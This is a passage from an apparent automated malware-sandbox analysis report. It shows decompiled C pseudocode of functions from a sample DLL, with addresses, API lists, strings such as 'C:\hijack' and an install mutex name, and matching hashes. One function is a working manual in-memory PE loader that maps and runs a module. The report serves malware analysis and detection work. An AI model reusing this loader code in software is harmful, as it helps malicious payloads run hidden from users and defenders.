						if(__eflags != 0) {
							L15:
							_t116 = _t115 - 0x1c;
							_v592 = _t116;
							_v616 = E10001160(_t116, __eflags, "status=check_debug");
							E10020180(_t82, _t100, _t102, __eflags);
							_t118 = _t116 + 0x1c - 0x1c;
							_v596 = _t118;
							_v620 = E10001160(_t118, __eflags, "user01");
							E1001FEA0(_t82, _t100, _t102, __eflags);
							_t120 = _t118 + 0x1c - 0x1c;
							_v600 = _t120;
							_v624 = E10001160(_t120, __eflags, "user01");
							E1001FDC0(_t82, _t100, _t102, __eflags);
							_v604 = _t120 + 0x1c - 0x1c;
							_v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
							E10020180(_t82, _t100, _t102, __eflags);
						} else {
							E1001A0A0();
							_t75 = E1001A0B0(_t89);
							__eflags = _t75;
							if(_t75 == 0) {
								L12:
							} else {
								__eflags = E10019D10();
								if(__eflags == 0) {
									_t77 = E1001FA30(_t82, _t100, _t102, __eflags, 0x3e8, 0);
									_t115 = _t115 + 8;
									__eflags = _t77;
									if(__eflags != 0) {
										goto L15;
									} else {
									}
								} else {
									goto L12;
								}
							}
						}
					} else {
					}
					E1001A260();
					_v608 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v608;
				} else {
					E10020A80(__ebx, _t100, _t101, _t126, "45.0.0"); // executed
					_v584 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v584;
				}
				 *[fs:0x0] = _v16;
				return _t73;
			}










































                                                                                                                                                      0x100204c0
                                                                                                                                                      0x100204c0
                                                                                                                                                      0x100204c0
                                                                                                                                                      0x100204c3
                                                                                                                                                      0x100204c5
                                                                                                                                                      0x100204d0
                                                                                                                                                      0x100204d1
                                                                                                                                                      0x100204de
                                                                                                                                                      0x100204df
                                                                                                                                                      0x100204e4
                                                                                                                                                      0x100204f9
                                                                                                                                                      0x1002050f
                                                                                                                                                      0x10020519
                                                                                                                                                      0x10020521
                                                                                                                                                      0x10020538
                                                                                                                                                      0x1002053d
                                                                                                                                                      0x10020540
                                                                                                                                                      0x10020542
                                                                                                                                                      0x1002057f
                                                                                                                                                      0x10020584
                                                                                                                                                      0x10020587
                                                                                                                                                      0x10020589
                                                                                                                                                      0x10020590
                                                                                                                                                      0x100205a5
                                                                                                                                                      0x100205b9
                                                                                                                                                      0x100205d4
                                                                                                                                                      0x100205d9
                                                                                                                                                      0x100205ec
                                                                                                                                                      0x100205f8
                                                                                                                                                      0x100205fe
                                                                                                                                                      0x10020605
                                                                                                                                                      0x1002060d
                                                                                                                                                      0x10020616
                                                                                                                                                      0x1002061b
                                                                                                                                                      0x1002061e
                                                                                                                                                      0x10020620
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10020627
                                                                                                                                                      0x10020639
                                                                                                                                                      0x1002063e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10020640
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1002063e
                                                                                                                                                      0x10020644
                                                                                                                                                      0x10020662
                                                                                                                                                      0x1002066a
                                                                                                                                                      0x1002066d
                                                                                                                                                      0x1002066f
                                                                                                                                                      0x1002067f
                                                                                                                                                      0x10020685
                                                                                                                                                      0x1002068a
                                                                                                                                                      0x10020698
                                                                                                                                                      0x1002069a
                                                                                                                                                      0x100206d0
                                                                                                                                                      0x100206d0
                                                                                                                                                      0x100206d5
                                                                                                                                                      0x100206e5
                                                                                                                                                      0x100206eb
                                                                                                                                                      0x100206f3
                                                                                                                                                      0x100206f8
                                                                                                                                                      0x10020708
                                                                                                                                                      0x1002070e
                                                                                                                                                      0x10020716
                                                                                                                                                      0x1002071b
                                                                                                                                                      0x1002072b
                                                                                                                                                      0x10020731
                                                                                                                                                      0x1002073e
                                                                                                                                                      0x1002074e
                                                                                                                                                      0x10020754
                                                                                                                                                      0x1002069c
                                                                                                                                                      0x1002069c
                                                                                                                                                      0x100206a1
                                                                                                                                                      0x100206a6
                                                                                                                                                      0x100206a8
                                                                                                                                                      0x100206b3
                                                                                                                                                      0x100206aa
                                                                                                                                                      0x100206af
                                                                                                                                                      0x100206b1
                                                                                                                                                      0x100206bf
                                                                                                                                                      0x100206c4
                                                                                                                                                      0x100206c7
                                                                                                                                                      0x100206c9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100206cb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100206b1
                                                                                                                                                      0x100206a8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1002058b
                                                                                                                                                      0x1002075c
                                                                                                                                                      0x10020761
                                                                                                                                                      0x1002076b
                                                                                                                                                      0x10020775
                                                                                                                                                      0x1002077a
                                                                                                                                                      0x10020544
                                                                                                                                                      0x10020549
                                                                                                                                                      0x10020551
                                                                                                                                                      0x1002055b
                                                                                                                                                      0x10020565
                                                                                                                                                      0x1002056a
                                                                                                                                                      0x1002056a
                                                                                                                                                      0x10020783
                                                                                                                                                      0x1002078e

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 100204F9
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002050F
                                                                                                                                                        • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                        • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileModuleName_memset$_sprintf
                                                                                                                                                      • String ID: -0.25$45.0.0$45.0.0$C:\hijack$Global\exist_sign__install_r3$exe$install$status=check_debug$status=main_over$status=main_start$user01$user01$user01
                                                                                                                                                      • API String ID: 3079340674-1842766907
                                                                                                                                                      • Opcode ID: 223e698365b0860e5aae29af135c91e351df2f6d4b25efb7f7cfea949ec79a0c
                                                                                                                                                      • Instruction ID: 7a4b6182ef5b3e753845166e3f5bee58e7f320f9ef64b03b030670d1f597adbb
                                                                                                                                                      • Opcode Fuzzy Hash: 223e698365b0860e5aae29af135c91e351df2f6d4b25efb7f7cfea949ec79a0c
                                                                                                                                                      • Instruction Fuzzy Hash: 5351A1B5D04318ABEB20EBA4DC4BBDE7775DB50344F500194F90966182EB71BB84CFA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A170, Relevance: 3.0, APIs: 2, Instructions: 21fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A170(CHAR* _a4) {
				struct _WIN32_FIND_DATAA _v324;
				intOrPtr _v328;
				void* _v332;
				void* _t11;

				_v328 = 0;
				_t11 = FindFirstFileA(_a4,  &_v324); // executed
				_v332 = _t11;
				if(_v332 != 0xffffffff) {
					_v328 = _v324.nFileSizeLow;
				}
				FindClose(_v332); // executed
				return _v328;
			}







                                                                                                                                                      0x1001a179
                                                                                                                                                      0x1001a18e
                                                                                                                                                      0x1001a194
                                                                                                                                                      0x1001a1a1
                                                                                                                                                      0x1001a1a9
                                                                                                                                                      0x1001a1a9
                                                                                                                                                      0x1001a1b6
                                                                                                                                                      0x1001a1c5

                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileA.KERNEL32(1001A679,?), ref: 1001A18E
                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 1001A1B6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                      • Opcode ID: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                      • Instruction ID: 097559f34e7186eb2c7e5fd791b7ca3a953ceb1394cb31efbd5b4482c630521c
                                                                                                                                                      • Opcode Fuzzy Hash: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                      • Instruction Fuzzy Hash: 66F0C974D0022C9BDB70DF64DD88BDDB7B8AB48310F1042D4E91DA32A0DA30AED58F50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001B620, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 350libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 73%
                                                                                                                                                      			E1001B620(void* __ebx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed short* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v68;
				char _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t170;
				void* _t173;
				void* _t182;
				intOrPtr _t184;
				void* _t194;
				void* _t203;
				void* _t206;
				void* _t207;
				void* _t209;
				intOrPtr _t220;
				intOrPtr _t225;
				void* _t239;
				intOrPtr _t311;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t337;
				void* _t338;
				void* _t339;

				_t327 = __esi;
				_t326 = __edi;
				_t239 = __ebx;
				_v76 = 0;
				_v20 = 0;
				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo");
				_t170 = E1001AE40(_a8, 0x40);
				_t329 = _t328 + 8;
				if(_t170 != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t9 =  &(_v16[0x1e]); // 0xc707ebe8
						_t173 = E1001AE40(_a8,  *_t9 + 0xf8);
						_t330 = _t329 + 8;
						if(_t173 != 0) {
							_t13 =  &(_v16[0x1e]); // 0xc707ebe8
							_v84 = _a4 +  *_t13;
							if( *_v84 == 0x4550) {
								if(( *(_v84 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v84 + 0x38) & 0x00000001) == 0) {
										_v88 = _v84 + ( *(_v84 + 0x14) & 0x0000ffff) + 0x18;
										_v36 =  *(_v84 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v84 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v88 + 0x10)) != 0) {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) +  *((intOrPtr*)(_v88 + 0x10));
											} else {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) + _v36;
											}
											if(_v92 > _v20) {
												_v20 = _v92;
											}
											_v12 = _v12 + 1;
											_v88 = _v88 + 0x28;
										}
										_v28( &_v72);
										_v32 = E1001AE80( *((intOrPtr*)(_v84 + 0x50)), _v68);
										_t182 = E1001AE80(_v20, _v68);
										_t332 = _t330 + 0x10;
										if(_v32 == _t182) {
											_t184 = _a12( *((intOrPtr*)(_v84 + 0x34)), _v32, 0x3000, 4, _a32);
											_t333 = _t332 + 0x14;
											_v24 = _t184;
											if(_v24 != 0) {
												L26:
												_v76 = HeapAlloc(GetProcessHeap(), 8, 0x40);
												if(_v76 != 0) {
													 *((intOrPtr*)(_v76 + 4)) = _v24;
													asm("sbb ecx, ecx");
													 *(_v76 + 0x14) =  ~( ~( *(_v84 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v76 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v76 + 0x20)) = _a16;
													 *((intOrPtr*)(_v76 + 0x24)) = _a20;
													 *((intOrPtr*)(_v76 + 0x28)) = _a24;
													 *((intOrPtr*)(_v76 + 0x2c)) = _a28;
													 *((intOrPtr*)(_v76 + 0x34)) = _a32;
													 *((intOrPtr*)(_v76 + 0x3c)) = _v68;
													_t194 = E1001AE40(_a8,  *((intOrPtr*)(_v84 + 0x54)));
													_t334 = _t333 + 8;
													if(_t194 != 0) {
														_v8 = _a12(_v24,  *((intOrPtr*)(_v84 + 0x54)), 0x1000, 4, _a32);
														E1000D190(_t239, _t326, _t327, _v8, _v16,  *((intOrPtr*)(_v84 + 0x54)));
														_t121 =  &(_v16[0x1e]); // 0xc707ebe8
														 *_v76 = _v8 +  *_t121;
														 *((intOrPtr*)( *_v76 + 0x34)) = _v24;
														_t203 = E1001B300(_t239, _t326, _t327, _a4, _a8, _v84, _v76); // executed
														_t337 = _t334 + 0x30;
														if(_t203 != 0) {
															_t311 =  *((intOrPtr*)( *_v76 + 0x34)) -  *((intOrPtr*)(_v84 + 0x34));
															_v80 = _t311;
															if(_t311 == 0) {
																 *((intOrPtr*)(_v76 + 0x18)) = 1;
															} else {
																_t220 = E1001B0C0(_v76, _v80);
																_t337 = _t337 + 8;
																 *((intOrPtr*)(_v76 + 0x18)) = _t220;
															}
															_t206 = E1001AB60(_v76); // executed
															_t338 = _t337 + 4;
															if(_t206 != 0) {
																_t207 = E1001B490(_v76); // executed
																_t339 = _t338 + 4;
																if(_t207 != 0) {
																	_t209 = E1001AD80(_v76);
																	_t339 = _t339 + 4;
																	if(_t209 != 0) {
																		if( *((intOrPtr*)( *_v76 + 0x28)) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = 0;
																			L49:
																			return _v76;
																		}
																		if( *(_v76 + 0x14) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v100 = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																		_v96 = _v100(_v24, 1, 0);
																		if(_v96 != 0) {
																			 *((intOrPtr*)(_v76 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E1001A960(_v76);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												_a16(_v24, 0, 0x8000, _a32);
												SetLastError(0xe);
												return 0;
											}
											_t225 = _a12(0, _v32, 0x3000, 4, _a32);
											_t333 = _t333 + 0x14;
											_v24 = _t225;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}












































                                                                                                                                                      0x1001b620
                                                                                                                                                      0x1001b620
                                                                                                                                                      0x1001b620
                                                                                                                                                      0x1001b626
                                                                                                                                                      0x1001b62d
                                                                                                                                                      0x1001b64b
                                                                                                                                                      0x1001b654
                                                                                                                                                      0x1001b659
                                                                                                                                                      0x1001b65e
                                                                                                                                                      0x1001b66a
                                                                                                                                                      0x1001b678
                                                                                                                                                      0x1001b68f
                                                                                                                                                      0x1001b69d
                                                                                                                                                      0x1001b6a2
                                                                                                                                                      0x1001b6a7
                                                                                                                                                      0x1001b6b6
                                                                                                                                                      0x1001b6b9
                                                                                                                                                      0x1001b6c5
                                                                                                                                                      0x1001b6e6
                                                                                                                                                      0x1001b703
                                                                                                                                                      0x1001b725
                                                                                                                                                      0x1001b72e
                                                                                                                                                      0x1001b731
                                                                                                                                                      0x1001b74c
                                                                                                                                                      0x1001b75f
                                                                                                                                                      0x1001b77b
                                                                                                                                                      0x1001b761
                                                                                                                                                      0x1001b76a
                                                                                                                                                      0x1001b76a
                                                                                                                                                      0x1001b784
                                                                                                                                                      0x1001b789
                                                                                                                                                      0x1001b789
                                                                                                                                                      0x1001b740
                                                                                                                                                      0x1001b749
                                                                                                                                                      0x1001b749
                                                                                                                                                      0x1001b792
                                                                                                                                                      0x1001b7a8
                                                                                                                                                      0x1001b7b3
                                                                                                                                                      0x1001b7b8
                                                                                                                                                      0x1001b7be
                                                                                                                                                      0x1001b7e8
                                                                                                                                                      0x1001b7eb
                                                                                                                                                      0x1001b7ee
                                                                                                                                                      0x1001b7f5
                                                                                                                                                      0x1001b826
                                                                                                                                                      0x1001b837
                                                                                                                                                      0x1001b83e
                                                                                                                                                      0x1001b86a
                                                                                                                                                      0x1001b87c
                                                                                                                                                      0x1001b883
                                                                                                                                                      0x1001b88c
                                                                                                                                                      0x1001b895
                                                                                                                                                      0x1001b89e
                                                                                                                                                      0x1001b8a7
                                                                                                                                                      0x1001b8b0
                                                                                                                                                      0x1001b8b9
                                                                                                                                                      0x1001b8c2
                                                                                                                                                      0x1001b8d0
                                                                                                                                                      0x1001b8d5
                                                                                                                                                      0x1001b8da
                                                                                                                                                      0x1001b8fd
                                                                                                                                                      0x1001b90f
                                                                                                                                                      0x1001b91d
                                                                                                                                                      0x1001b923
                                                                                                                                                      0x1001b92d
                                                                                                                                                      0x1001b940
                                                                                                                                                      0x1001b945
                                                                                                                                                      0x1001b94a
                                                                                                                                                      0x1001b95c
                                                                                                                                                      0x1001b95f
                                                                                                                                                      0x1001b962
                                                                                                                                                      0x1001b97f
                                                                                                                                                      0x1001b964
                                                                                                                                                      0x1001b96c
                                                                                                                                                      0x1001b971
                                                                                                                                                      0x1001b977
                                                                                                                                                      0x1001b977
                                                                                                                                                      0x1001b98a
                                                                                                                                                      0x1001b98f
                                                                                                                                                      0x1001b994
                                                                                                                                                      0x1001b99f
                                                                                                                                                      0x1001b9a4
                                                                                                                                                      0x1001b9a9
                                                                                                                                                      0x1001b9b4
                                                                                                                                                      0x1001b9b9
                                                                                                                                                      0x1001b9be
                                                                                                                                                      0x1001b9cb
                                                                                                                                                      0x1001ba27
                                                                                                                                                      0x1001ba2e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ba2e
                                                                                                                                                      0x1001b9d4
                                                                                                                                                      0x1001ba1f
                                                                                                                                                      0x1001ba22
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ba22
                                                                                                                                                      0x1001b9e1
                                                                                                                                                      0x1001b9ef
                                                                                                                                                      0x1001b9f6
                                                                                                                                                      0x1001ba08
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ba08
                                                                                                                                                      0x1001b9fd
                                                                                                                                                      0x1001ba33
                                                                                                                                                      0x1001ba37
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ba3f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b9c0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b9ab
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b996
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b94c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b8dc
                                                                                                                                                      0x1001b84f
                                                                                                                                                      0x1001b857
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b85d
                                                                                                                                                      0x1001b808
                                                                                                                                                      0x1001b80b
                                                                                                                                                      0x1001b80e
                                                                                                                                                      0x1001b815
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b819
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b81f
                                                                                                                                                      0x1001b7c5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b7cb
                                                                                                                                                      0x1001b70a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b710
                                                                                                                                                      0x1001b6ed
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b6f3
                                                                                                                                                      0x1001b6cc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b6d2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b6a9
                                                                                                                                                      0x1001b67f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b685
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1001B63E
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 1001B645
                                                                                                                                                        • Part of subcall function 1001AE40: SetLastError.KERNEL32(0000000D,?,1001B659,100207E4,00000040), ref: 1001AE4D
                                                                                                                                                      • SetLastError.KERNEL32(000000C1), ref: 1001B67F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                      • API String ID: 1762409328-192647395
                                                                                                                                                      • Opcode ID: e3701e4d903ec74dc5ef954786c854f9baa6ea88c08b49a674e627b22a4b0214
                                                                                                                                                      • Instruction ID: 948ec142860bc01625bc2ce9e1704a97d6b06a0078abf06e4df2749841334317
                                                                                                                                                      • Opcode Fuzzy Hash: e3701e4d903ec74dc5ef954786c854f9baa6ea88c08b49a674e627b22a4b0214
                                                                                                                                                      • Instruction Fuzzy Hash: CAE1E5B4E00609DFDB04CF94C885AAEBBB5FF88304F648558E905AF395D774E982CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000E90E, Relevance: 25.6, APIs: 17, Instructions: 90memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                      			E1000E90E() {
				int _t13;
				long _t19;
				signed int _t20;
				signed int _t21;
				signed int _t22;
				signed int _t23;
				signed int _t27;
				signed int _t28;
				signed int _t32;
				signed int _t33;
				void* _t37;
				long _t39;
				void* _t40;
				signed int _t47;
				struct _OSVERSIONINFOA* _t49;
				void* _t51;

				_t37 = GetProcessHeap;
				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
				if(_t49 != 0) {
					_t49->dwOSVersionInfoSize = 0x94;
					_t13 = GetVersionExA(_t49);
					__eflags = _t13;
					_push(_t49);
					_push(0);
					if(_t13 != 0) {
						 *(_t51 + 0xc) = _t49->dwPlatformId;
						 *(_t51 + 0x10) = _t49->dwMajorVersion;
						 *(_t51 - 4) = _t49->dwMinorVersion;
						_t47 = _t49->dwBuildNumber & 0x00007fff;
						HeapFree(GetProcessHeap(), ??, ??);
						_t19 =  *(_t51 + 0xc);
						__eflags = _t19 - 2;
						if(_t19 != 2) {
							_t47 = _t47 | 0x00008000;
							__eflags = _t47;
						}
						_t39 =  *(_t51 - 4);
						 *0x1033347c = _t19;
						_t20 =  *(_t51 + 0x10);
						_t44 = (_t20 << 8) + _t39;
						 *0x10333484 = (_t20 << 8) + _t39;
						 *0x10333488 = _t20;
						 *0x1033348c = _t39;
						 *0x10333480 = _t47;
						_t21 = E1000F7BF(1);
						__eflags = _t21;
						_pop(_t40);
						if(_t21 == 0) {
							goto L1;
						} else {
							_t23 = E100133E0(_t37);
							__eflags = _t23;
							if(_t23 != 0) {
								E10015081();
								 *0x10336f64 = GetCommandLineA();
								 *0x103332fc = E10014F4C(); // executed
								_t27 = E10014994(_t37, _t44, _t47, _t49, __eflags); // executed
								__eflags = _t27;
								if(_t27 >= 0) {
									_t28 = E10014E93(_t40);
									__eflags = _t28;
									if(_t28 < 0) {
										L15:
										E10014BD4();
										goto L10;
									} else {
										_t32 = E10014C20(_t40, _t44);
										__eflags = _t32;
										if(_t32 < 0) {
											goto L15;
										} else {
											_t33 = E1001167A(_t37, _t47, _t49, _t51, 0);
											__eflags = _t33;
											if(_t33 != 0) {
												goto L15;
											} else {
												 *0x103332f8 =  *0x103332f8 + 1;
												_t22 = 1;
												__eflags = 1;
											}
										}
									}
								} else {
									L10:
									E100130CA();
									goto L8;
								}
							} else {
								L8:
								E1000F819();
								goto L1;
							}
						}
					} else {
						HeapFree(GetProcessHeap(), ??, ??);
						goto L1;
					}
				} else {
					L1:
					_t22 = 0;
				}
				return _t22;
			}



















                                                                                                                                                      0x1000e90e
                                                                                                                                                      0x1000e925
                                                                                                                                                      0x1000e929
                                                                                                                                                      0x1000e933
                                                                                                                                                      0x1000e935
                                                                                                                                                      0x1000e93b
                                                                                                                                                      0x1000e93d
                                                                                                                                                      0x1000e93e
                                                                                                                                                      0x1000e940
                                                                                                                                                      0x1000e953
                                                                                                                                                      0x1000e959
                                                                                                                                                      0x1000e95f
                                                                                                                                                      0x1000e962
                                                                                                                                                      0x1000e96b
                                                                                                                                                      0x1000e971
                                                                                                                                                      0x1000e974
                                                                                                                                                      0x1000e977
                                                                                                                                                      0x1000e979
                                                                                                                                                      0x1000e979
                                                                                                                                                      0x1000e979
                                                                                                                                                      0x1000e97f
                                                                                                                                                      0x1000e982
                                                                                                                                                      0x1000e987
                                                                                                                                                      0x1000e98f
                                                                                                                                                      0x1000e993
                                                                                                                                                      0x1000e999
                                                                                                                                                      0x1000e99e
                                                                                                                                                      0x1000e9a4
                                                                                                                                                      0x1000e9aa
                                                                                                                                                      0x1000e9af
                                                                                                                                                      0x1000e9b1
                                                                                                                                                      0x1000e9b2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000e9b8
                                                                                                                                                      0x1000e9b8
                                                                                                                                                      0x1000e9bd
                                                                                                                                                      0x1000e9bf
                                                                                                                                                      0x1000e9cb
                                                                                                                                                      0x1000e9d6
                                                                                                                                                      0x1000e9e0
                                                                                                                                                      0x1000e9e5
                                                                                                                                                      0x1000e9ea
                                                                                                                                                      0x1000e9ec
                                                                                                                                                      0x1000e9f5
                                                                                                                                                      0x1000e9fa
                                                                                                                                                      0x1000e9fc
                                                                                                                                                      0x1000ea1e
                                                                                                                                                      0x1000ea1e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000e9fe
                                                                                                                                                      0x1000e9fe
                                                                                                                                                      0x1000ea03
                                                                                                                                                      0x1000ea05
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ea07
                                                                                                                                                      0x1000ea09
                                                                                                                                                      0x1000ea0e
                                                                                                                                                      0x1000ea11
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ea13
                                                                                                                                                      0x1000ea13
                                                                                                                                                      0x1000eacc
                                                                                                                                                      0x1000eacc
                                                                                                                                                      0x1000eacc
                                                                                                                                                      0x1000ea11
                                                                                                                                                      0x1000ea05
                                                                                                                                                      0x1000e9ee
                                                                                                                                                      0x1000e9ee
                                                                                                                                                      0x1000e9ee
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000e9ee
                                                                                                                                                      0x1000e9c1
                                                                                                                                                      0x1000e9c1
                                                                                                                                                      0x1000e9c1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000e9c1
                                                                                                                                                      0x1000e9bf
                                                                                                                                                      0x1000e942
                                                                                                                                                      0x1000e945
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000e945
                                                                                                                                                      0x1000e92b
                                                                                                                                                      0x1000e92b
                                                                                                                                                      0x1000e92b
                                                                                                                                                      0x1000e92b
                                                                                                                                                      0x1000ead1

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
